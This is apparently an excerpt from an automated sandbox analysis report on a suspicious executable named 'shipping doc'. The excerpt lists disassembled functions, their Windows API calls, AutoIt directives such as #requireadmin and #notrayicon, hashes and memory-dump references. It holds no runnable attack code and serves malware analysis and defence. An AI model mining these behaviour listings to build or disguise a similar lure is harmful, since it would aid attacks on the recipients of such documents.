                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Delete$InfoItem
                                                                                              • String ID: 0
                                                                                              • API String ID: 135850232-4108050209
                                                                                              • Opcode ID: 94ff7675728669b78ec4ab26f0da7d074ca6f6b3e08d7d165d0446105c338f27
                                                                                              • Instruction ID: ab372a5a6f5944e386ffbeecc3ef10cf80941bf812b943e907715db6f76578ab
                                                                                              • Opcode Fuzzy Hash: 94ff7675728669b78ec4ab26f0da7d074ca6f6b3e08d7d165d0446105c338f27
                                                                                              • Instruction Fuzzy Hash: 5941C0362063019FD724DF25D884B5ABBE8BF85320F008A1DF9A5972E1D770E904CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0017CC08,00000000,?,?,?,?), ref: 001744AA
                                                                                              • GetWindowLongW.USER32 ref: 001744C7
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001744D7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long
                                                                                              • String ID: SysTreeView32
                                                                                              • API String ID: 847901565-1698111956
                                                                                              • Opcode ID: 268b3ef63b52c692f360c92bc713ee02208304323afd85e6496f30dab1dd0cdf
                                                                                              • Instruction ID: 4541eb9e976140dbc4292dc1f99d0f25815c691ebf7ad748e38de5ef878bc2d2
                                                                                              • Opcode Fuzzy Hash: 268b3ef63b52c692f360c92bc713ee02208304323afd85e6496f30dab1dd0cdf
                                                                                              • Instruction Fuzzy Hash: B8319E31210205AFDF218E78DC45BEA77B9EB09334F208715F979A21E1DB70EC909B50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0016335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00163077,?,?), ref: 00163378
                                                                                              • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0016307A
                                                                                              • _wcslen.LIBCMT ref: 0016309B
                                                                                              • htons.WSOCK32(00000000,?,?,00000000), ref: 00163106
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                              • String ID: 255.255.255.255
                                                                                              • API String ID: 946324512-2422070025
                                                                                              • Opcode ID: 1c3f2bbbe98d32d3fe2080b99138bfd80be4d482feac9528c44af19473d65488
                                                                                              • Instruction ID: 62241129d6a822f64e687b6ed14f50f0f51c1ac1b9ef182e8b39405b8e4eb071
                                                                                              • Opcode Fuzzy Hash: 1c3f2bbbe98d32d3fe2080b99138bfd80be4d482feac9528c44af19473d65488
                                                                                              • Instruction Fuzzy Hash: C63104392002019FCB20CF28C985EAA77F0EF15318F248059E9258B392CB32EF85C761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00174705
                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00174713
                                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0017471A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                              • String ID: msctls_updown32
                                                                                              • API String ID: 4014797782-2298589950
                                                                                              • Opcode ID: 12dfeafbe3ad0780a926686266f688d36e0a312ed2062c972ac6f8f00243390b
                                                                                              • Instruction ID: 1afceae5d28289c892fc20f3f543849632550a994166b29aaef284c13d40b680
                                                                                              • Opcode Fuzzy Hash: 12dfeafbe3ad0780a926686266f688d36e0a312ed2062c972ac6f8f00243390b
                                                                                              • Instruction Fuzzy Hash: 022190B5600208BFDB10DF64DCD1DA737BDEB9A3A8B004149FA049B391CB30EC51CAA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                              • API String ID: 176396367-2734436370
                                                                                              • Opcode ID: 4f0b951071c720f199934edd9c547539d4bc6e58ffe5fdb7dff3cb4a8aa1e312
                                                                                              • Instruction ID: 803f1f6484dbfe184aba03a3176f571a9c1f78c46457b3473a1546ad6e23bcb3
                                                                                              • Opcode Fuzzy Hash: 4f0b951071c720f199934edd9c547539d4bc6e58ffe5fdb7dff3cb4a8aa1e312
                                                                                              • Instruction Fuzzy Hash: C3216D7210815166C331BB25EC02FB773D89FA5320F11842AF98D9B0A2EB919D42C2D5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00173840
                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00173850
                                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00173876
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$MoveWindow
                                                                                              • String ID: Listbox
                                                                                              • API String ID: 3315199576-2633736733
                                                                                              • Opcode ID: 033c231e3dff40e07bcac00420cdf48e0a3e41769b81795a5280357417e70a2a
                                                                                              • Instruction ID: 0153998708b4d09059f0ae0e073f34c56ee3a4b38c23aa9a5a95caf778350849
                                                                                              • Opcode Fuzzy Hash: 033c231e3dff40e07bcac00420cdf48e0a3e41769b81795a5280357417e70a2a
                                                                                              • Instruction Fuzzy Hash: 29218E72610218BBEB258F54DC85FAB377EEF89760F118224F9589B190CB72DC5297A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00154A08
                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00154A5C
                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,0017CC08), ref: 00154AD0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$InformationVolume
                                                                                              • String ID: %lu
                                                                                              • API String ID: 2507767853-685833217
                                                                                              • Opcode ID: 5a0706a0e38401b57da7ae50c2e3025aa0338c1c64108f33c0c4a887184d3008
                                                                                              • Instruction ID: 61f92e42da769545f9f98e577fa46585b61a92c6f85ce871aec24895f8428105
                                                                                              • Opcode Fuzzy Hash: 5a0706a0e38401b57da7ae50c2e3025aa0338c1c64108f33c0c4a887184d3008
                                                                                              • Instruction Fuzzy Hash: AA310F75A00109AFDB11DF54C985EAA77F8EF05308F1480A9F909DB252D771EE85CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0017424F
                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00174264
                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00174271
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: msctls_trackbar32
                                                                                              • API String ID: 3850602802-1010561917
                                                                                              • Opcode ID: 376cf895730795db88218c2b0b7fb6ea1ffd804d99b80fce1e9110ceb6fb3369
                                                                                              • Instruction ID: 50453d11a8ed90d12171cf271fbc3654899316c79f611e93ca0aca2789b76ec6
                                                                                              • Opcode Fuzzy Hash: 376cf895730795db88218c2b0b7fb6ea1ffd804d99b80fce1e9110ceb6fb3369
                                                                                              • Instruction Fuzzy Hash: 7711E331240248BFEF209E29DC06FAB3BBCEF95B54F114514FA59E2091D371DC619B50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E6B57: _wcslen.LIBCMT ref: 000E6B6A
                                                                                                • Part of subcall function 00142DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00142DC5
                                                                                                • Part of subcall function 00142DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00142DD6
                                                                                                • Part of subcall function 00142DA7: GetCurrentThreadId.KERNEL32 ref: 00142DDD
                                                                                                • Part of subcall function 00142DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00142DE4
                                                                                              • GetFocus.USER32 ref: 00142F78
                                                                                                • Part of subcall function 00142DEE: GetParent.USER32(00000000), ref: 00142DF9
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00142FC3
                                                                                              • EnumChildWindows.USER32(?,0014303B), ref: 00142FEB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                              • String ID: %s%d
                                                                                              • API String ID: 1272988791-1110647743
                                                                                              • Opcode ID: 2da2ec7c9e44e9189083abe541c18a0c7770d804d616ea01f70ff5fd3aab4f37
                                                                                              • Instruction ID: 6d4907ae7203061c393224a53aabc735e37144674a244d62a8b9ecce8aba861b
                                                                                              • Opcode Fuzzy Hash: 2da2ec7c9e44e9189083abe541c18a0c7770d804d616ea01f70ff5fd3aab4f37
                                                                                              • Instruction Fuzzy Hash: CE11B4716002056BCF157FB09CC5EEE37AAAF94314F044079F919AB262DF3199858B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001758C1
                                                                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001758EE
                                                                                              • DrawMenuBar.USER32(?), ref: 001758FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$InfoItem$Draw
                                                                                              • String ID: 0
                                                                                              • API String ID: 3227129158-4108050209
                                                                                              • Opcode ID: 07e21346ae5701364d5823ceca8c2baac55afa57aa976943a51b3c8f23faa5cc
                                                                                              • Instruction ID: 9b9b8c92197c0fb193c67957560e7412781d4c9a0e3d442bb1a96b96038835a8
                                                                                              • Opcode Fuzzy Hash: 07e21346ae5701364d5823ceca8c2baac55afa57aa976943a51b3c8f23faa5cc
                                                                                              • Instruction Fuzzy Hash: 91015731600219EEDB219F11DC44BAEBBB5FF45364F10C0A9E94DDA162EB718AC4EF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0013D3BF
                                                                                              • FreeLibrary.KERNEL32 ref: 0013D3E5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeLibraryProc
                                                                                              • String ID: GetSystemWow64DirectoryW$X64
                                                                                              • API String ID: 3013587201-2590602151
                                                                                              • Opcode ID: f5d28f2a0ce7e2431b1e6507bbee5087cbc88e37c920c89b26cebe006ce88ee7
                                                                                              • Instruction ID: b8be29743603926c2d3f455be10e2e66623f97cacc90457824337ba61777122b
                                                                                              • Opcode Fuzzy Hash: f5d28f2a0ce7e2431b1e6507bbee5087cbc88e37c920c89b26cebe006ce88ee7
                                                                                              • Instruction Fuzzy Hash: E7F0E5A1906621DBE7755610BC58AAE3324BF10741F9A8169F80AF6555DB20CFC087D2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: daf402e4a889023a9ae3132a5b861b60915471737acf555289ed4139056b22bb
                                                                                              • Instruction ID: 699ed8469d68c7e5b84759557911c45f5b72a7f48bcc7d2298d384a6224085fa
                                                                                              • Opcode Fuzzy Hash: daf402e4a889023a9ae3132a5b861b60915471737acf555289ed4139056b22bb
                                                                                              • Instruction Fuzzy Hash: 05C17D75A00206EFCB15CFA5C894EAEBBB5FF48704F118598E605EB261D771EE81CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInitInitializeUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 1998397398-0
                                                                                              • Opcode ID: 351792cbe2979a84f9e0e93138ea600497bb1b2abfbf04fd2ac7847d3e266675
                                                                                              • Instruction ID: 69eaf52142e97701d500bf3c04cafcaee83e9f6c8166e59c6453373216443369
                                                                                              • Opcode Fuzzy Hash: 351792cbe2979a84f9e0e93138ea600497bb1b2abfbf04fd2ac7847d3e266675
                                                                                              • Instruction Fuzzy Hash: 76A15B766047009FC700DF29C885A6AB7E5FF89714F04885DF99AAB362DB70EE41CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0017FC08,?), ref: 001405F0
                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0017FC08,?), ref: 00140608
                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,0017CC40,000000FF,?,00000000,00000800,00000000,?,0017FC08,?), ref: 0014062D
                                                                                              • _memcmp.LIBVCRUNTIME ref: 0014064E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 314563124-0
                                                                                              • Opcode ID: 99459caba824a34acf26e00a25e0af8d75fd8cbcae5e2ddcc817d86087dc3090
                                                                                              • Instruction ID: 0e80d0a90c1c05c05056da6778d040f3d6d7ed403a5b6766f6dbfd8eebc56f12
                                                                                              • Opcode Fuzzy Hash: 99459caba824a34acf26e00a25e0af8d75fd8cbcae5e2ddcc817d86087dc3090
                                                                                              • Instruction Fuzzy Hash: 6F811B71A00109EFCB05DF95C984EEEB7B9FF89315F204558E606AB260DB71AE46CF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: ad6d5d7490b6ab58ab601475d352535198706c8b3c42b5d0efbf0945a01fda71
                                                                                              • Instruction ID: 12cb7ce6b87c96d27c129a4e87e9d87d18125df1e51a87a9907cdffe7476fc6d
                                                                                              • Opcode Fuzzy Hash: ad6d5d7490b6ab58ab601475d352535198706c8b3c42b5d0efbf0945a01fda71
                                                                                              • Instruction Fuzzy Hash: 3B415831A00164BBDB25FBB8BC466AE3AA5EF71330F14027AF41CD61D1E77088A192A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowRect.USER32(0186E708,?), ref: 001762E2
                                                                                              • ScreenToClient.USER32(?,?), ref: 00176315
                                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00176382
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                              • String ID:
                                                                                              • API String ID: 3880355969-0
                                                                                              • Opcode ID: 1c3cc7f049e19a2448bad41d5c766d54f04419adc5ce8a069ead2c3d73684a17
                                                                                              • Instruction ID: 88f4a5fcc87f980ac7ba3ffc4842152983402ca78e459c5d6375ec845ff20c41
                                                                                              • Opcode Fuzzy Hash: 1c3cc7f049e19a2448bad41d5c766d54f04419adc5ce8a069ead2c3d73684a17
                                                                                              • Instruction Fuzzy Hash: C4515C74A00649EFDF10DF68D8809AE7BB6FF55364F108269F8199B2A1D730ED81CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00161AFD
                                                                                              • WSAGetLastError.WSOCK32 ref: 00161B0B
                                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00161B8A
                                                                                              • WSAGetLastError.WSOCK32 ref: 00161B94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
